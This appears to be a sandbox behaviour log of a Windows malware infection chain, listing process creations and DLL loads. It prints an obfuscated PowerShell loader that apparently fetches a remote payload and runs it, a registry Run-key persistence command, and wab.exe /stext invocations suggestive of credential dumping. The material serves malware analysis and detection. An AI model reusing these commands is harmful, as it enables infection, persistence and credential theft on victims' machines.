PensNois=.kvaND ugePaliw Vul- HarO egabArmojFlereAldrc F.rtCy e Man SUna yN nssBkketTabeeF,rgmHakk.Dis.N Exte BritBar,.BrieWEthieFan,bEfteCSaltlManni.lideBrnenBaa,t Tem ');Regulerbare (Teucrium 'foli$ rusDPleorAmtsiKlokfovertA sesRolap Te.rCil.oUdlubCretlG,beeI Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Presignal23.Hal && echo $" Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Vibeka" /t REG_EXPAND_SZ /d "%Pneumatorrhachis% -w 1 $Salpeterholdiges=(Get-ItemProperty -Path 'HKCU:\Quicker\').Savvy;%Pneumatorrhachis% ($Salpeterholdiges)" Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Sydstligstes.vbs" Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\eeubmxzcykpvacklrogamlalknwo" Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\oyatnpkwmshzkiypaztbxymclbnxnmdl" Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\oyatnpkwmshzkiypaztbxymclbnxnmdl" Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\oyatnpkwmshzkiypaztbxymclbnxnmdl" Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\zbfe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Vibeka" /t REG_EXPAND_SZ /d "%Pneumatorrhachis% -w 1 $Salpeterholdiges=(Get-ItemProperty -Path 'HKCU:\Quicker\').Savvy;%Pneumatorrhachis% ($Salpeterholdiges)" Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Raakolde = 1;$Fornrmet='S';$Fornrmet+='ubstrin';$Fornrmet+='g';Function Circumflexes($Cumulet){$Semimonarchically=$Cumulet.Length-$Raakolde;For($Habitually=4; $Habitually -lt $Semimonarchically; $Habitually+=(5)){$Wenzel+=$Cumulet.$Fornrmet.Invoke($Habitually, $Raakolde);}$Wenzel;}function Jettes($trendy){&($Indbagendes) ($trendy);}$Simultansceners=Circumflexes 'Ark,MMervoAn.czVampiT lel ElelBlreaSy.o/Jagt5 ve.Seac0T,sp Ryg.( KrmW.urdiRiitn s rdPi do.orhwAllosHjem G,oN PraT.oli ,eg1Inte0Remb.Spra0Anal;Duct Ret.WVagtiAtomnskyt6Aced4 Non;Falc F.glx.art6Pseu4.icr;Rovf MilrGramvNert:Nara1H,lg2Rive1Unde.Sopr0Pres)Vrd. P.slG,ndeeCubacSkinkTilloOffp/Slib2Pl r0Ned,1Appe0Onyc0Ven,1 enn0Trfi1 Bre V deFMickiKonsr traeA.trf dr oQrscxSamm/Moor1Hard2 ,or1Werf.,yde0.uto ';$Optrins45=Circumflexes 'tidsUI.prsP,yceSkabrover-StemAUkeng,ondeLivinE,tetHera ';$Levemulighed=Circumflexes 'B,slhG,ldt MentInflpKo,m:Conf/Ke,d/,ndf8Ago.7 bal.Pige1Cann2.ejl1 Fer.,rol1Diet0Nona5 Ske..ata1 Bl,6Ex.e3Kast/SrmrD Kile Ne.tSkreeIndmn rot MyxiBe aoKonknConse BoynDesi.s,rtj.attaDissv toda Non ';$Cose=Circumflexes 'Skor>Undi ';$Indbagendes=Circumflexes 'Dm,niMilieSelsx Bar ';$Nutritionary133='Paakldtes';Jettes (Circumflexes 'Ch dSSonaeAutotAlda-UnmyC.rocoValgn,annt Ende.enin S.dtO er Can- NobP ixta Fo.tBindhMe.k VrdiTSorg:Baga\Pt.rFbureoPot,rOutshTot,j S.iuretrlillesFletbTikmr GabeSmaamRadesAmoreT ivs.lbn.MargtAircx iltSaut Pote-La dVKinea Boll SafuEncaeDiap ,npr$CausN IlluDiglt Tndr,nbriKon,tBra,iUn.koDegenSpydaTricr egnyKrim1K.ip3Erem3L.eb; Bri ');Jettes (Circumflexes 'Tr.ni.inkfHoo. Skil(Indit AroeUndesuafmtEpit-DrukpFareaSkibtDuplhAfid silTRuck:None\Sla,F Sgeo Bu,rTec.hobsejAp.puQuanlBloks ostbs,mmrP osePal.mSocisCudbe Pics A,m.Te rtBre,xDigit ,fl),era{Giske andxRe aiNacrtCham}Pg.e;Ergo ');$Ballplayers248 = Circumflexes ' nkeSpikc Udmhsiego lgu Eksp%S,paaBagepTaktpOtopdElemaimpetarchaTran%She,\ParaATrignKolltHo,eiangulSkrmltr.ke Anpa JounChr,1Umed4 C.s4Sur...lumGVilkrBel.oJe n Ef e&sa,m&D.ge UpfieBil cUnnah KreoN,np Ci.i$ Kri ';Jettes (Circumflexes 'Real$,eclgFalsl.nifoAxi,bWolfaAfselCoin:SgesFScrso vrmrBrbaaBronn kkek Tabr,obbiGre nResig Kr,s oltpOveruCafenOverksol t KureBagnt Bits .ps=Abd.(dab,cSju.mEl md ,in Ferr/Calcc Ch, F rs$BedrBPi radra,lSna lurfjpMarklDialaIrr.yIndve R,trSeiss Puz2Duct4Ba.h8Phot)Dri ');Jettes (Circumflexes 'Ha.l$SlvsgEftel nfoSt,ibM.inaTabplTick: SpeA MoklEctovSubte UneoRegilSndaiErodtDispemdresTol =Lnn,$MyndLRaskeSkilv W.veForbmStrauf rflGauki.azigYemehPreee TradDole.RegesEft.p Ci.lIndaiVar.tVa,e(Sume$EnheCFormo.dves Pree G.n)Spil ');$Levemulighed=$Alveolites[0];Jettes (Circumflexes 'Anbr$.addgU.trl ,taoim ebTa.ba.alclB,nk:BestS.orkk GibeM,aspJotatS yti ,uncCoa,=partNDagbe KecwUrok-,lafOwainb ejljSkrseUns.curo.t.onc B anSSvalyVands igmtM.sceJug mSoap.FascNPhyleFre,t iga..oncWHetee Cikb istCDeralkin iSporeMetanMapptF er ');Jet Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Antillean144.Gro && echo $" Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Raakolde = 1;$Fornrmet='S';$Fornrmet+='ubstrin';$Fornrmet+='g';Function Circumflexes($Cumulet){$Semimonarchically=$Cumulet.Length-$Raakolde;For($Habitually=4; $Habitually -lt $Semimonarchically; $Habitually+=(5)){$Wenzel+=$Cumulet.$Fornrmet.Invoke($Habitually, $Raakolde);}$Wenzel;}function Jettes($trendy){&($Indbagendes) ($trendy);}$Simultansceners=Circumflexes 'Ark,MMervoAn.czVampiT lel ElelBlreaSy.o/Jagt5 ve.Seac0T,sp Ryg.( KrmW.urdiRiitn s rdPi do.orhwAllosHjem G,oN PraT.oli ,eg1Inte0Remb.Spra0Anal;Duct Ret.WVagtiAtomnskyt6Aced4 Non;Falc F.glx.art6Pseu4.icr;Rovf MilrGramvNert:Nara1H,lg2Rive1Unde.Sopr0Pres)Vrd. P.slG,ndeeCubacSkinkTilloOffp/Slib2Pl r0Ned,1Appe0Onyc0Ven,1 enn0Trfi1 Bre V deFMickiKonsr traeA.trf dr oQrscxSamm/Moor1Hard2 ,or1Werf.,yde0.uto ';$Optrins45=Circumflexes 'tidsUI.prsP,yceSkabrover-StemAUkeng,ondeLivinE,tetHera ';$Levemulighed=Circumflexes 'B,slhG,ldt MentInflpKo,m:Conf/Ke,d/,ndf8Ago.7 bal.Pige1Cann2.ejl1 Fer.,rol1Diet0Nona5 Ske..ata1 Bl,6Ex.e3Kast/SrmrD Kile Ne.tSkreeIndmn rot MyxiBe aoKonknConse BoynDesi.s,rtj.attaDissv toda Non ';$Cose=Circumflexes 'Skor>Undi ';$Indbagendes=Circumflexes 'Dm,niMilieSelsx Bar ';$Nutritionary133='Paakldtes';Jettes (Circumflexes 'Ch dSSonaeAutotAlda-UnmyC.rocoValgn,annt Ende.enin S.dtO er Can- NobP ixta Fo.tBindhMe.k VrdiTSorg:Baga\Pt.rFbureoPot,rOutshTot,j S.iuretrlillesFletbTikmr GabeSmaamRadesAmoreT ivs.lbn.MargtAircx iltSaut Pote-La dVKinea Boll SafuEncaeDiap ,npr$CausN IlluDiglt Tndr,nbriKon,tBra,iUn.koDegenSpydaTricr egnyKrim1K.ip3Erem3L.eb; Bri ');Jettes (Circumflexes 'Tr.ni.inkfHoo. Skil(Indit AroeUndesuafmtEpit-DrukpFareaSkibtDuplhAfid silTRuck:None\Sla,F Sgeo Bu,rTec.hobsejAp.puQuanlBloks ostbs,mmrP osePal.mSocisCudbe Pics A,m.Te rtBre,xDigit ,fl),era{Giske andxRe aiNacrtCham}Pg.e;Ergo ');$Ballplayers248 = Circumflexes ' nkeSpikc Udmhsiego lgu Eksp%S,paaBagepTaktpOtopdElemaimpetarchaTran%She,\ParaATrignKolltHo,eiangulSkrmltr.ke Anpa JounChr,1Umed4 C.s4Sur...lumGVilkrBel.oJe n Ef e&sa,m&D.ge UpfieBil cUnnah KreoN,np Ci.i$ Kri ';Jettes (Circumflexes 'Real$,eclgFalsl.nifoAxi,bWolfaAfselCoin:SgesFScrso vrmrBrbaaBronn kkek Tabr,obbiGre nResig Kr,s oltpOveruCafenOverksol t KureBagnt Bits .ps=Abd.(dab,cSju.mEl md ,in Ferr/Calcc Ch, F rs$BedrBPi radra,lSna lurfjpMarklDialaIrr.yIndve R,trSeiss Puz2Duct4Ba.h8Phot)Dri ');Jettes (Circumflexes 'Ha.l$SlvsgEftel nfoSt,ibM.inaTabplTick: SpeA MoklEctovSubte UneoRegilSndaiErodtDispemdresTol =Lnn,$MyndLRaskeSkilv W.veForbmStrauf rflGauki.azigYemehPreee TradDole.RegesEft.p Ci.lIndaiVar.tVa,e(Sume$EnheCFormo.dves Pree G.n)Spil ');$Levemulighed=$Alveolites[0];Jettes (Circumflexes 'Anbr$.addgU.trl ,taoim ebTa.ba.alclB,nk:BestS.orkk GibeM,aspJotatS yti ,uncCoa,=partNDagbe KecwUrok-,lafOwainb ejljSkrseUns.curo.t.onc B anSSvalyVands igmtM.sceJug mSoap.FascNPhyleFre,t iga..oncWHetee Cikb istCDeralkin iSporeMetanMapptF er ');Jet Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Antillean144.Gro && echo $"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "bynkefugls" /t REG_EXPAND_SZ /d "%Deciduate% -w 1 $Xdiv=(Get-ItemProperty -Path 'HKCU:\Clouters\').Slapperne;%Deciduate% ($Xdiv)"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "bynkefugls" /t REG_EXPAND_SZ /d "%Deciduate% -w 1 $Xdiv=(Get-ItemProperty -Path 'HKCU:\Clouters\').Slapperne;%Deciduate% ($Xdiv)"
Source: C:\Program Files (x86)\PcmmMKygSewVgdnvXkjKwrsqcoRyaVFxntOTxZGoblcdKcSGqptWoAvhsTFYfzuOi\qDlmBUIvkRrWNd.exe Process created: C:\Windows\SysWOW64\clip.exe "C:\Windows\SysWOW64\clip.exe"
Source: C:\Windows\SysWOW64\clip.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: vbscript.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: slc.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: ncrypt.dll Jump to behavior
